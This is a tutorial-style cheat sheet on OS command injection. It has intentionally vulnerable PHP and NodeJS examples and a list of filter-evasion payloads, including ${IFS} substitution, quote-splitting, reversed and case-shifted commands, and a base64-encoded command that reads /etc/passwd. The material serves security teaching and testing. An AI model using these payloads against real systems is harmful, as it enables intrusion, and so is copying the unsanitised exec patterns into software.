Command Injection

Injection vulnerabilities are among the top risks identified by OWASP, owing to their high impact and prevalence. Command injection occurs when user-controlled input is misinterpreted as part of an OS command or code executed on the back-end, allowing an attacker to alter the intended behavior of the application.

Types of Injection

OS Command Injections

When user input is incorporated—directly or indirectly—into a system command, the application may execute unintended commands. Various programming languages offer functions to run OS commands, and if these functions do not adequately sanitize input, they become a prime target for exploitation.

PHP Example

<?php
if (isset($_GET['filename'])) {
    system("touch /tmp/" . $_GET['filename'] . ".pdf");
}
?>

NodeJS Example

app.get("/createfile", function(req, res){
    child_process.exec(`touch /tmp/${req.query.filename}.txt`);
});

Detection

Detecting OS command injection vulnerabilities often involves appending various payloads to user-supplied input and observing the output. Look for unexpected results or the output of system commands (e.g., the result of whoami). This helps confirm that the application is executing commands based on user input.

Command Injection Methods

Different injection operators and techniques can be used to separate or chain commands. Below is a table summarizing common methods:

Tip: Bypass front-end restrictions by using a proxy (e.g., BurpSuite) to modify or URL-encode POST requests.

Filter Evasions

Even if developers attempt to block certain characters or commands via blacklists or WAFs, bypass techniques may still succeed:

• Breaking Down Our Payload:
  Often, an attacker sends a payload containing:
  • A semicolon (;)
  • A space
  • A command (e.g., whoami)

  If these characters or commands are blacklisted, the application might detect or block the payload. To bypass such filters, attackers experiment with alternative representations.

Bypassing Space Filters

• Use a tab character instead of a space.
• Substitute the space with ${IFS} (Internal Field Separator in Linux).
  Example: 127.0.0.1%0a${IFS}
• Brace Expansions may also be effective.

Bypassing Other Blacklisted Characters

• Environment Variables:
  Some variables can yield specific characters. For example:
  • echo ${PATH:0:1} might return /
  • echo ${LS_COLORS:10:1} might return ;
  • echo %HOMEPATH:~6,-11% might return \
• Character Shifting:
  Shift characters in the ASCII table to bypass filters. For instance, using tr to shift a character:

  echo $(tr '!-}' '"-~' <<<[)
  

  This method prints the desired character by adjusting the input.

Bypassing Blacklisted Commands

• Linux Examples:
  • w'h'o'am'I
  • who$@ami
  • w\ho\am\i
• Windows Example:
  • who^ami

Command Obfuscation

Obfuscate commands to avoid detection:

• Case Manipulation:
  Example: wHoaMi (convert case with tr, e.g., $(tr "[A-Z]" "[a-z]" <<< "WhOaMi"))
• Reverse Commands:
  • Linux:

    echo 'whoami' | rev
    # Execute reversed: $(rev <<< 'imaohw')
    

  • Windows:

    "whoami"[-1..-20] -join ''
    iex "$('imaohw'[-1..-20] -join '')"
    

• Encoded Commands:
  Encode commands using base64 or hex encoding.
  • Linux:

    bash <<< $(base64 -d <<< Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
    

  • Windows (PowerShell):

    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
    iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
    

Evasion Tools

• Linux: Tools like Bashfuscator can obfuscate shell commands.
• Windows: DOSfuscation tools help bypass command injection filters.
• • Burp-Extensions: To DO useful burp extensions.

By understanding these techniques, security professionals can both identify and remediate command injection vulnerabilities, ensuring that user input is properly sanitized before being used in system-level commands.